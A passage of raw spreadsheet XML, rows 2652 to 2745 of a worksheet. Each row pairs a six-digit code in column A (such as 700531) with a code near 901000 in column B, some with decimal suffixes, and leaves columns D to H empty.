      <c r="D2652" s="5"/>
      <c r="E2652" s="3"/>
      <c r="F2652" s="1"/>
      <c r="H2652" s="1"/>
    </row>
    <row r="2653" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2653" s="5">
        <v>700536</v>
      </c>
      <c r="B2653" s="3">
        <v>901406</v>
      </c>
      <c r="D2653" s="5"/>
      <c r="E2653" s="3"/>
      <c r="F2653" s="1"/>
      <c r="H2653" s="1"/>
    </row>
    <row r="2654" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2654" s="5">
        <v>700536</v>
      </c>
      <c r="B2654" s="3">
        <v>901603</v>
      </c>
      <c r="D2654" s="5"/>
      <c r="E2654" s="3"/>
      <c r="F2654" s="1"/>
      <c r="H2654" s="1"/>
    </row>
    <row r="2655" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2655" s="5">
        <v>700536</v>
      </c>
      <c r="B2655" s="3">
        <v>901582</v>
      </c>
      <c r="D2655" s="5"/>
      <c r="E2655" s="3"/>
      <c r="F2655" s="1"/>
      <c r="H2655" s="1"/>
    </row>
    <row r="2656" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2656" s="5">
        <v>700536</v>
      </c>
      <c r="B2656" s="3">
        <v>901437</v>
      </c>
      <c r="D2656" s="5"/>
      <c r="E2656" s="3"/>
      <c r="F2656" s="1"/>
      <c r="H2656" s="1"/>
    </row>
    <row r="2657" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2657" s="5">
        <v>700536</v>
      </c>
      <c r="B2657" s="3">
        <v>901426</v>
      </c>
      <c r="D2657" s="5"/>
      <c r="E2657" s="3"/>
      <c r="F2657" s="1"/>
      <c r="H2657" s="1"/>
    </row>
    <row r="2658" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2658" s="5">
        <v>700536</v>
      </c>
      <c r="B2658" s="3">
        <v>901422</v>
      </c>
      <c r="D2658" s="5"/>
      <c r="E2658" s="3"/>
      <c r="F2658" s="1"/>
      <c r="H2658" s="1"/>
    </row>
    <row r="2659" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2659" s="5">
        <v>700531</v>
      </c>
      <c r="B2659" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D2659" s="5"/>
      <c r="E2659" s="3"/>
      <c r="F2659" s="1"/>
      <c r="H2659" s="1"/>
    </row>
    <row r="2660" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2660" s="5">
        <v>700531</v>
      </c>
      <c r="B2660" s="3">
        <v>901087.00300000003</v>
      </c>
      <c r="D2660" s="5"/>
      <c r="E2660" s="3"/>
      <c r="F2660" s="1"/>
      <c r="H2660" s="1"/>
    </row>
    <row r="2661" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2661" s="5">
        <v>700531</v>
      </c>
      <c r="B2661" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2661" s="5"/>
      <c r="E2661" s="3"/>
      <c r="F2661" s="1"/>
      <c r="H2661" s="1"/>
    </row>
    <row r="2662" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2662" s="5">
        <v>700531</v>
      </c>
      <c r="B2662" s="3">
        <v>901010</v>
      </c>
      <c r="D2662" s="5"/>
      <c r="E2662" s="3"/>
      <c r="F2662" s="1"/>
      <c r="H2662" s="1"/>
    </row>
    <row r="2663" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2663" s="5">
        <v>700531</v>
      </c>
      <c r="B2663" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2663" s="5"/>
      <c r="E2663" s="3"/>
      <c r="F2663" s="1"/>
      <c r="H2663" s="1"/>
    </row>
    <row r="2664" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2664" s="5">
        <v>700531</v>
      </c>
      <c r="B2664" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D2664" s="5"/>
      <c r="E2664" s="3"/>
      <c r="F2664" s="1"/>
      <c r="H2664" s="1"/>
    </row>
    <row r="2665" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2665" s="5">
        <v>700531</v>
      </c>
      <c r="B2665" s="3">
        <v>901176</v>
      </c>
      <c r="D2665" s="5"/>
      <c r="E2665" s="3"/>
      <c r="F2665" s="1"/>
      <c r="H2665" s="1"/>
    </row>
    <row r="2666" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2666" s="5">
        <v>700531</v>
      </c>
      <c r="B2666" s="3">
        <v>901185</v>
      </c>
      <c r="D2666" s="5"/>
      <c r="E2666" s="3"/>
      <c r="F2666" s="1"/>
      <c r="H2666" s="1"/>
    </row>
    <row r="2667" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2667" s="5">
        <v>700531</v>
      </c>
      <c r="B2667" s="3">
        <v>901115</v>
      </c>
      <c r="D2667" s="5"/>
      <c r="E2667" s="3"/>
      <c r="F2667" s="1"/>
      <c r="H2667" s="1"/>
    </row>
    <row r="2668" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2668" s="5">
        <v>700531</v>
      </c>
      <c r="B2668" s="3">
        <v>901059.005</v>
      </c>
      <c r="D2668" s="5"/>
      <c r="E2668" s="3"/>
      <c r="F2668" s="1"/>
      <c r="H2668" s="1"/>
    </row>
    <row r="2669" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2669" s="5">
        <v>700531</v>
      </c>
      <c r="B2669" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D2669" s="5"/>
      <c r="E2669" s="3"/>
      <c r="F2669" s="1"/>
      <c r="H2669" s="1"/>
    </row>
    <row r="2670" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2670" s="5">
        <v>700531</v>
      </c>
      <c r="B2670" s="3">
        <v>901140</v>
      </c>
      <c r="D2670" s="5"/>
      <c r="E2670" s="3"/>
      <c r="F2670" s="1"/>
      <c r="H2670" s="1"/>
    </row>
    <row r="2671" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2671" s="5">
        <v>700531</v>
      </c>
      <c r="B2671" s="3">
        <v>901189</v>
      </c>
      <c r="D2671" s="5"/>
      <c r="E2671" s="3"/>
      <c r="F2671" s="1"/>
      <c r="H2671" s="1"/>
    </row>
    <row r="2672" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2672" s="5">
        <v>700531</v>
      </c>
      <c r="B2672" s="3">
        <v>901568.00199999998</v>
      </c>
      <c r="D2672" s="5"/>
      <c r="E2672" s="3"/>
      <c r="F2672" s="1"/>
      <c r="H2672" s="1"/>
    </row>
    <row r="2673" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2673" s="5">
        <v>700531</v>
      </c>
      <c r="B2673" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D2673" s="5"/>
      <c r="E2673" s="3"/>
      <c r="F2673" s="1"/>
      <c r="H2673" s="1"/>
    </row>
    <row r="2674" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2674" s="5">
        <v>700531</v>
      </c>
      <c r="B2674" s="3">
        <v>901041</v>
      </c>
      <c r="D2674" s="5"/>
      <c r="E2674" s="3"/>
      <c r="F2674" s="1"/>
      <c r="H2674" s="1"/>
    </row>
    <row r="2675" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2675" s="5">
        <v>700531</v>
      </c>
      <c r="B2675" s="3">
        <v>901222.00100000005</v>
      </c>
      <c r="D2675" s="5"/>
      <c r="E2675" s="3"/>
      <c r="F2675" s="1"/>
      <c r="H2675" s="1"/>
    </row>
    <row r="2676" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2676" s="5">
        <v>700531</v>
      </c>
      <c r="B2676" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D2676" s="5"/>
      <c r="E2676" s="3"/>
      <c r="F2676" s="1"/>
      <c r="H2676" s="1"/>
    </row>
    <row r="2677" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2677" s="5">
        <v>700531</v>
      </c>
      <c r="B2677" s="3">
        <v>901562.00399999996</v>
      </c>
      <c r="D2677" s="5"/>
      <c r="E2677" s="3"/>
      <c r="F2677" s="1"/>
      <c r="H2677" s="1"/>
    </row>
    <row r="2678" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2678" s="5">
        <v>700531</v>
      </c>
      <c r="B2678" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2678" s="5"/>
      <c r="E2678" s="3"/>
      <c r="F2678" s="1"/>
      <c r="H2678" s="1"/>
    </row>
    <row r="2679" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2679" s="5">
        <v>700531</v>
      </c>
      <c r="B2679" s="3">
        <v>901105</v>
      </c>
      <c r="D2679" s="5"/>
      <c r="E2679" s="3"/>
      <c r="F2679" s="1"/>
      <c r="H2679" s="1"/>
    </row>
    <row r="2680" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2680" s="5">
        <v>700531</v>
      </c>
      <c r="B2680" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D2680" s="5"/>
      <c r="E2680" s="3"/>
      <c r="F2680" s="1"/>
      <c r="H2680" s="1"/>
    </row>
    <row r="2681" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2681" s="5">
        <v>700531</v>
      </c>
      <c r="B2681" s="3">
        <v>901036.005</v>
      </c>
      <c r="D2681" s="5"/>
      <c r="E2681" s="3"/>
      <c r="F2681" s="1"/>
      <c r="H2681" s="1"/>
    </row>
    <row r="2682" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2682" s="5">
        <v>700531</v>
      </c>
      <c r="B2682" s="3">
        <v>901112</v>
      </c>
      <c r="D2682" s="5"/>
      <c r="E2682" s="3"/>
      <c r="F2682" s="1"/>
      <c r="H2682" s="1"/>
    </row>
    <row r="2683" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2683" s="5">
        <v>700531</v>
      </c>
      <c r="B2683" s="3">
        <v>901106</v>
      </c>
      <c r="D2683" s="5"/>
      <c r="E2683" s="3"/>
      <c r="F2683" s="1"/>
      <c r="H2683" s="1"/>
    </row>
    <row r="2684" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2684" s="5">
        <v>700531</v>
      </c>
      <c r="B2684" s="3">
        <v>901027</v>
      </c>
      <c r="D2684" s="5"/>
      <c r="E2684" s="3"/>
      <c r="F2684" s="1"/>
      <c r="H2684" s="1"/>
    </row>
    <row r="2685" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2685" s="5">
        <v>700531</v>
      </c>
      <c r="B2685" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D2685" s="5"/>
      <c r="E2685" s="3"/>
      <c r="F2685" s="1"/>
      <c r="H2685" s="1"/>
    </row>
    <row r="2686" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2686" s="5">
        <v>700531</v>
      </c>
      <c r="B2686" s="3">
        <v>901566.00199999998</v>
      </c>
      <c r="D2686" s="5"/>
      <c r="E2686" s="3"/>
      <c r="F2686" s="1"/>
      <c r="H2686" s="1"/>
    </row>
    <row r="2687" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2687" s="5">
        <v>700531</v>
      </c>
      <c r="B2687" s="3">
        <v>901057</v>
      </c>
      <c r="D2687" s="5"/>
      <c r="E2687" s="3"/>
      <c r="F2687" s="1"/>
      <c r="H2687" s="1"/>
    </row>
    <row r="2688" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2688" s="5">
        <v>700531</v>
      </c>
      <c r="B2688" s="3">
        <v>901218.00699999998</v>
      </c>
      <c r="D2688" s="5"/>
      <c r="E2688" s="3"/>
      <c r="F2688" s="1"/>
      <c r="H2688" s="1"/>
    </row>
    <row r="2689" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2689" s="5">
        <v>700531</v>
      </c>
      <c r="B2689" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D2689" s="5"/>
      <c r="E2689" s="3"/>
      <c r="F2689" s="1"/>
      <c r="H2689" s="1"/>
    </row>
    <row r="2690" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2690" s="5">
        <v>700531</v>
      </c>
      <c r="B2690" s="3">
        <v>901539</v>
      </c>
      <c r="D2690" s="5"/>
      <c r="E2690" s="3"/>
      <c r="F2690" s="1"/>
      <c r="H2690" s="1"/>
    </row>
    <row r="2691" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2691" s="5">
        <v>700531</v>
      </c>
      <c r="B2691" s="3">
        <v>901082</v>
      </c>
      <c r="D2691" s="5"/>
      <c r="E2691" s="3"/>
      <c r="F2691" s="1"/>
      <c r="H2691" s="1"/>
    </row>
    <row r="2692" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2692" s="5">
        <v>700531</v>
      </c>
      <c r="B2692" s="3">
        <v>901016</v>
      </c>
      <c r="D2692" s="5"/>
      <c r="E2692" s="3"/>
      <c r="F2692" s="1"/>
      <c r="H2692" s="1"/>
    </row>
    <row r="2693" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2693" s="5">
        <v>700531</v>
      </c>
      <c r="B2693" s="3">
        <v>901033</v>
      </c>
      <c r="D2693" s="5"/>
      <c r="E2693" s="3"/>
      <c r="F2693" s="1"/>
      <c r="H2693" s="1"/>
    </row>
    <row r="2694" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2694" s="5">
        <v>700531</v>
      </c>
      <c r="B2694" s="3">
        <v>901124</v>
      </c>
      <c r="D2694" s="5"/>
      <c r="E2694" s="3"/>
      <c r="F2694" s="1"/>
      <c r="H2694" s="1"/>
    </row>
    <row r="2695" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2695" s="5">
        <v>700531</v>
      </c>
      <c r="B2695" s="3">
        <v>901204.00100000005</v>
      </c>
      <c r="D2695" s="5"/>
      <c r="E2695" s="3"/>
      <c r="F2695" s="1"/>
      <c r="H2695" s="1"/>
    </row>
    <row r="2696" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2696" s="5">
        <v>700531</v>
      </c>
      <c r="B2696" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D2696" s="5"/>
      <c r="E2696" s="3"/>
      <c r="F2696" s="1"/>
      <c r="H2696" s="1"/>
    </row>
    <row r="2697" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2697" s="5">
        <v>700531</v>
      </c>
      <c r="B2697" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D2697" s="5"/>
      <c r="E2697" s="3"/>
      <c r="F2697" s="1"/>
      <c r="H2697" s="1"/>
    </row>
    <row r="2698" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2698" s="5">
        <v>700531</v>
      </c>
      <c r="B2698" s="3">
        <v>901102.00100000005</v>
      </c>
      <c r="D2698" s="5"/>
      <c r="E2698" s="3"/>
      <c r="F2698" s="1"/>
      <c r="H2698" s="1"/>
    </row>
    <row r="2699" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2699" s="5">
        <v>700237</v>
      </c>
      <c r="B2699" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2699" s="5"/>
      <c r="E2699" s="3"/>
      <c r="F2699" s="1"/>
      <c r="H2699" s="1"/>
    </row>
    <row r="2700" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2700" s="5">
        <v>700237</v>
      </c>
      <c r="B2700" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2700" s="5"/>
      <c r="E2700" s="3"/>
      <c r="F2700" s="1"/>
      <c r="H2700" s="1"/>
    </row>
    <row r="2701" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2701" s="5">
        <v>700237</v>
      </c>
      <c r="B2701" s="3">
        <v>901005</v>
      </c>
      <c r="D2701" s="5"/>
      <c r="E2701" s="3"/>
      <c r="F2701" s="1"/>
      <c r="H2701" s="1"/>
    </row>
    <row r="2702" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2702" s="5">
        <v>700237</v>
      </c>
      <c r="B2702" s="3">
        <v>901025</v>
      </c>
      <c r="D2702" s="5"/>
      <c r="E2702" s="3"/>
      <c r="F2702" s="1"/>
      <c r="H2702" s="1"/>
    </row>
    <row r="2703" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2703" s="5">
        <v>700237</v>
      </c>
      <c r="B2703" s="3">
        <v>901083</v>
      </c>
      <c r="D2703" s="5"/>
      <c r="E2703" s="3"/>
      <c r="F2703" s="1"/>
      <c r="H2703" s="1"/>
    </row>
    <row r="2704" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2704" s="5">
        <v>700237</v>
      </c>
      <c r="B2704" s="3">
        <v>901559.00199999998</v>
      </c>
      <c r="D2704" s="5"/>
      <c r="E2704" s="3"/>
      <c r="F2704" s="1"/>
      <c r="H2704" s="1"/>
    </row>
    <row r="2705" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2705" s="5">
        <v>700237</v>
      </c>
      <c r="B2705" s="3">
        <v>901571</v>
      </c>
      <c r="D2705" s="5"/>
      <c r="E2705" s="3"/>
      <c r="F2705" s="1"/>
      <c r="H2705" s="1"/>
    </row>
    <row r="2706" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2706" s="5">
        <v>700237</v>
      </c>
      <c r="B2706" s="3">
        <v>901027</v>
      </c>
      <c r="D2706" s="5"/>
      <c r="E2706" s="3"/>
      <c r="F2706" s="1"/>
      <c r="H2706" s="1"/>
    </row>
    <row r="2707" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2707" s="5">
        <v>700237</v>
      </c>
      <c r="B2707" s="3">
        <v>901027.005</v>
      </c>
      <c r="D2707" s="5"/>
      <c r="E2707" s="3"/>
      <c r="F2707" s="1"/>
      <c r="H2707" s="1"/>
    </row>
    <row r="2708" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2708" s="5">
        <v>700237</v>
      </c>
      <c r="B2708" s="3">
        <v>901057</v>
      </c>
      <c r="D2708" s="5"/>
      <c r="E2708" s="3"/>
      <c r="F2708" s="1"/>
      <c r="H2708" s="1"/>
    </row>
    <row r="2709" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2709" s="5">
        <v>700237</v>
      </c>
      <c r="B2709" s="3">
        <v>901053.005</v>
      </c>
      <c r="D2709" s="5"/>
      <c r="E2709" s="3"/>
      <c r="F2709" s="1"/>
      <c r="H2709" s="1"/>
    </row>
    <row r="2710" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2710" s="5">
        <v>700237</v>
      </c>
      <c r="B2710" s="3">
        <v>901082</v>
      </c>
      <c r="D2710" s="5"/>
      <c r="E2710" s="3"/>
      <c r="F2710" s="1"/>
      <c r="H2710" s="1"/>
    </row>
    <row r="2711" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2711" s="5">
        <v>700237</v>
      </c>
      <c r="B2711" s="3">
        <v>901016</v>
      </c>
      <c r="D2711" s="5"/>
      <c r="E2711" s="3"/>
      <c r="F2711" s="1"/>
      <c r="H2711" s="1"/>
    </row>
    <row r="2712" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2712" s="5">
        <v>700237</v>
      </c>
      <c r="B2712" s="3">
        <v>901049</v>
      </c>
      <c r="D2712" s="5"/>
      <c r="E2712" s="3"/>
      <c r="F2712" s="1"/>
      <c r="H2712" s="1"/>
    </row>
    <row r="2713" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2713" s="5">
        <v>700237</v>
      </c>
      <c r="B2713" s="3">
        <v>901033</v>
      </c>
      <c r="D2713" s="5"/>
      <c r="E2713" s="3"/>
      <c r="F2713" s="1"/>
      <c r="H2713" s="1"/>
    </row>
    <row r="2714" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2714" s="5">
        <v>700237</v>
      </c>
      <c r="B2714" s="3">
        <v>901007</v>
      </c>
      <c r="D2714" s="5"/>
      <c r="E2714" s="3"/>
      <c r="F2714" s="1"/>
      <c r="H2714" s="1"/>
    </row>
    <row r="2715" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2715" s="5">
        <v>700237</v>
      </c>
      <c r="B2715" s="3">
        <v>901124</v>
      </c>
      <c r="D2715" s="5"/>
      <c r="E2715" s="3"/>
      <c r="F2715" s="1"/>
      <c r="H2715" s="1"/>
    </row>
    <row r="2716" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2716" s="5">
        <v>700237</v>
      </c>
      <c r="B2716" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D2716" s="5"/>
      <c r="E2716" s="3"/>
      <c r="F2716" s="1"/>
      <c r="H2716" s="1"/>
    </row>
    <row r="2717" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2717" s="5">
        <v>700237</v>
      </c>
      <c r="B2717" s="3">
        <v>901047</v>
      </c>
      <c r="D2717" s="5"/>
      <c r="E2717" s="3"/>
      <c r="F2717" s="1"/>
      <c r="H2717" s="1"/>
    </row>
    <row r="2718" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2718" s="5">
        <v>700342</v>
      </c>
      <c r="B2718" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2718" s="5"/>
      <c r="E2718" s="3"/>
      <c r="F2718" s="1"/>
      <c r="H2718" s="1"/>
    </row>
    <row r="2719" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2719" s="5">
        <v>700342</v>
      </c>
      <c r="B2719" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2719" s="5"/>
      <c r="E2719" s="3"/>
      <c r="F2719" s="1"/>
      <c r="H2719" s="1"/>
    </row>
    <row r="2720" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2720" s="5">
        <v>700342</v>
      </c>
      <c r="B2720" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D2720" s="5"/>
      <c r="E2720" s="3"/>
      <c r="F2720" s="1"/>
      <c r="H2720" s="1"/>
    </row>
    <row r="2721" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2721" s="5">
        <v>700342</v>
      </c>
      <c r="B2721" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D2721" s="5"/>
      <c r="E2721" s="3"/>
      <c r="F2721" s="1"/>
      <c r="H2721" s="1"/>
    </row>
    <row r="2722" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2722" s="5">
        <v>700342</v>
      </c>
      <c r="B2722" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D2722" s="5"/>
      <c r="E2722" s="3"/>
      <c r="F2722" s="1"/>
      <c r="H2722" s="1"/>
    </row>
    <row r="2723" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2723" s="5">
        <v>700342</v>
      </c>
      <c r="B2723" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D2723" s="5"/>
      <c r="E2723" s="3"/>
      <c r="F2723" s="1"/>
      <c r="H2723" s="1"/>
    </row>
    <row r="2724" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2724" s="5">
        <v>700342</v>
      </c>
      <c r="B2724" s="3">
        <v>901105</v>
      </c>
      <c r="D2724" s="5"/>
      <c r="E2724" s="3"/>
      <c r="F2724" s="1"/>
      <c r="H2724" s="1"/>
    </row>
    <row r="2725" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2725" s="5">
        <v>700342</v>
      </c>
      <c r="B2725" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D2725" s="5"/>
      <c r="E2725" s="3"/>
      <c r="F2725" s="1"/>
      <c r="H2725" s="1"/>
    </row>
    <row r="2726" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2726" s="5">
        <v>700342</v>
      </c>
      <c r="B2726" s="3">
        <v>901112</v>
      </c>
      <c r="D2726" s="5"/>
      <c r="E2726" s="3"/>
      <c r="F2726" s="1"/>
      <c r="H2726" s="1"/>
    </row>
    <row r="2727" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2727" s="5">
        <v>700342</v>
      </c>
      <c r="B2727" s="3">
        <v>901027</v>
      </c>
      <c r="D2727" s="5"/>
      <c r="E2727" s="3"/>
      <c r="F2727" s="1"/>
      <c r="H2727" s="1"/>
    </row>
    <row r="2728" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2728" s="5">
        <v>700342</v>
      </c>
      <c r="B2728" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D2728" s="5"/>
      <c r="E2728" s="3"/>
      <c r="F2728" s="1"/>
      <c r="H2728" s="1"/>
    </row>
    <row r="2729" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2729" s="5">
        <v>700342</v>
      </c>
      <c r="B2729" s="3">
        <v>901003.00100000005</v>
      </c>
      <c r="D2729" s="5"/>
      <c r="E2729" s="3"/>
      <c r="F2729" s="1"/>
      <c r="H2729" s="1"/>
    </row>
    <row r="2730" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2730" s="5">
        <v>700342</v>
      </c>
      <c r="B2730" s="3">
        <v>901055.00199999998</v>
      </c>
      <c r="D2730" s="5"/>
      <c r="E2730" s="3"/>
      <c r="F2730" s="1"/>
      <c r="H2730" s="1"/>
    </row>
    <row r="2731" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2731" s="5">
        <v>700342</v>
      </c>
      <c r="B2731" s="3">
        <v>901090.00300000003</v>
      </c>
      <c r="D2731" s="5"/>
      <c r="E2731" s="3"/>
      <c r="F2731" s="1"/>
      <c r="H2731" s="1"/>
    </row>
    <row r="2732" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2732" s="5">
        <v>700342</v>
      </c>
      <c r="B2732" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D2732" s="5"/>
      <c r="E2732" s="3"/>
      <c r="F2732" s="1"/>
      <c r="H2732" s="1"/>
    </row>
    <row r="2733" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2733" s="5">
        <v>700342</v>
      </c>
      <c r="B2733" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D2733" s="5"/>
      <c r="E2733" s="3"/>
      <c r="F2733" s="1"/>
      <c r="H2733" s="1"/>
    </row>
    <row r="2734" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2734" s="5">
        <v>700342</v>
      </c>
      <c r="B2734" s="3">
        <v>901007</v>
      </c>
      <c r="D2734" s="5"/>
      <c r="E2734" s="3"/>
      <c r="F2734" s="1"/>
      <c r="H2734" s="1"/>
    </row>
    <row r="2735" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2735" s="5">
        <v>700417</v>
      </c>
      <c r="B2735" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2735" s="5"/>
      <c r="E2735" s="3"/>
      <c r="F2735" s="1"/>
      <c r="H2735" s="1"/>
    </row>
    <row r="2736" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2736" s="5">
        <v>700417</v>
      </c>
      <c r="B2736" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D2736" s="5"/>
      <c r="E2736" s="3"/>
      <c r="F2736" s="1"/>
      <c r="H2736" s="1"/>
    </row>
    <row r="2737" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2737" s="5">
        <v>700417</v>
      </c>
      <c r="B2737" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D2737" s="5"/>
      <c r="E2737" s="3"/>
      <c r="F2737" s="1"/>
      <c r="H2737" s="1"/>
    </row>
    <row r="2738" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2738" s="5">
        <v>700417</v>
      </c>
      <c r="B2738" s="3">
        <v>901069.00199999998</v>
      </c>
      <c r="D2738" s="5"/>
      <c r="E2738" s="3"/>
      <c r="F2738" s="1"/>
      <c r="H2738" s="1"/>
    </row>
    <row r="2739" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2739" s="5">
        <v>700417</v>
      </c>
      <c r="B2739" s="3">
        <v>901053.005</v>
      </c>
      <c r="D2739" s="5"/>
      <c r="E2739" s="3"/>
      <c r="F2739" s="1"/>
      <c r="H2739" s="1"/>
    </row>
    <row r="2740" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2740" s="5">
        <v>700417</v>
      </c>
      <c r="B2740" s="3">
        <v>901113</v>
      </c>
      <c r="D2740" s="5"/>
      <c r="E2740" s="3"/>
      <c r="F2740" s="1"/>
      <c r="H2740" s="1"/>
    </row>
    <row r="2741" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2741" s="5">
        <v>700417</v>
      </c>
      <c r="B2741" s="3">
        <v>901082</v>
      </c>
      <c r="D2741" s="5"/>
      <c r="E2741" s="3"/>
      <c r="F2741" s="1"/>
      <c r="H2741" s="1"/>
    </row>
    <row r="2742" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2742" s="5">
        <v>700417</v>
      </c>
      <c r="B2742" s="3">
        <v>901124</v>
      </c>
      <c r="D2742" s="5"/>
      <c r="E2742" s="3"/>
      <c r="F2742" s="1"/>
      <c r="H2742" s="1"/>
    </row>
    <row r="2743" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2743" s="5">
        <v>700632</v>
      </c>
      <c r="B2743" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D2743" s="5"/>
      <c r="E2743" s="3"/>
      <c r="F2743" s="1"/>
      <c r="H2743" s="1"/>
    </row>
    <row r="2744" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2744" s="5">
        <v>700632</v>
      </c>
      <c r="B2744" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D2744" s="5"/>
      <c r="E2744" s="3"/>
      <c r="F2744" s="1"/>
      <c r="H2744" s="1"/>
    </row>
    <row r="2745" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A2745" s="5">
        <v>700632</v>
      </c>
      <c r="B2745" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D2745" s="5"/>
      <c r="E2745" s="3"/>
      <c r="F2745" s="1"/>
      <c r="H2745" s="1"/>
    </row>
